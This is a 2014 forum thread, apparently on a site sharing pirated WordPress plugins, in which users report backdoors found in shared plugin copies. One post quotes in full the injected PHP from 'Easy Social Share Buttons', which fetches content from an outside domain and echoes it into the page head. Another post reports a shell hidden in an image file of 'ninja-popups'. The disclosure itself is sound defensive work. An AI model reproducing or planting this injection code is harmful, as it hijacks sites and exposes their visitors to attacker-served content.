04-20-2014, 01:15 PM
(04-20-2014 02:45 AM)Kleaklea Wrote: [ -> ]do you have popup domination?Oh. Sorry. I thought it's wordpress theme. My mistake. Will move it to wordpress plugin list. :(
04-20-2014, 01:15 PM
04-21-2014, 01:28 AM
04-21-2014, 02:07 AM
04-21-2014, 03:56 AM
04-21-2014, 05:10 AM
04-22-2014, 03:05 PM
Thanks.. Its an awesome list. 
But I found one of the plugin contains malicious code which will redirect users to a youtube video.
Plugin name is "Easy Social Share Buttons".
Redirecting code is in a php file 'easy-social-share-buttons/lib/admin/pages/essb-settings-class.php'.
search for "http://spamcheckr.com/l.php"
Remove
Please update the plugin and reupload.
But I found one of the plugin contains malicious code which will redirect users to a youtube video.
Plugin name is "Easy Social Share Buttons".
Redirecting code is in a php file 'easy-social-share-buttons/lib/admin/pages/essb-settings-class.php'.
search for "http://spamcheckr.com/l.php"
Remove
Code:
<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc00_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc00_chesk');}} ?>Please update the plugin and reupload.
04-23-2014, 07:30 PM
(04-22-2014 03:05 PM)prohacker1324 Wrote: [ -> ]Thanks.. Its an awesome list.Sorry bro. But I only collect them. I'm not thier owner. I will remove it. :(
But I found one of the plugin contains malicious code which will redirect users to a youtube video.
Plugin name is "Easy Social Share Buttons".
Redirecting code is in a php file 'easy-social-share-buttons/lib/admin/pages/essb-settings-class.php'.
search for "http://spamcheckr.com/l.php"
Remove
Please update the plugin and reupload.
04-23-2014, 10:48 PM
Cool.. I found 1 more... 
Plugin : ninja-popups v2.4 - Theme123.Net
Infected file : ninja-popups v2.4 - Theme123.Net/img/social.png
Open with a text editor, then you can find the crap php code in that image file.
Now it serious.. its definitely an exploit shell. If anybody has downloaded and installed this plugin, highly recommended to change the server password and ssh keys before the attacker gets access. I know its too late.
Bro, are you downloading and uploading the files from theme123.Net ? Same plugin I downloaded from theme123.Net for testing and still I can see the exploit file there. Anyway atleast check before you upload.
Quote:base64
Plugin : ninja-popups v2.4 - Theme123.Net
Infected file : ninja-popups v2.4 - Theme123.Net/img/social.png
Open with a text editor, then you can find the crap php code in that image file.
Now it serious.. its definitely an exploit shell. If anybody has downloaded and installed this plugin, highly recommended to change the server password and ssh keys before the attacker gets access. I know its too late.
Bro, are you downloading and uploading the files from theme123.Net ? Same plugin I downloaded from theme123.Net for testing and still I can see the exploit file there. Anyway atleast check before you upload.
(04-23-2014 07:30 PM)bhwseo.com Wrote: [ -> ](04-22-2014 03:05 PM)prohacker1324 Wrote: [ -> ]Thanks.. Its an awesome list.Sorry bro. But I only collect them. I'm not thier owner. I will remove it. :(
But I found one of the plugin contains malicious code which will redirect users to a youtube video.
Plugin name is "Easy Social Share Buttons".
Redirecting code is in a php file 'easy-social-share-buttons/lib/admin/pages/essb-settings-class.php'.
search for "http://spamcheckr.com/l.php"
Remove
Please update the plugin and reupload.
04-24-2014, 03:31 AM
04-24-2014, 05:05 AM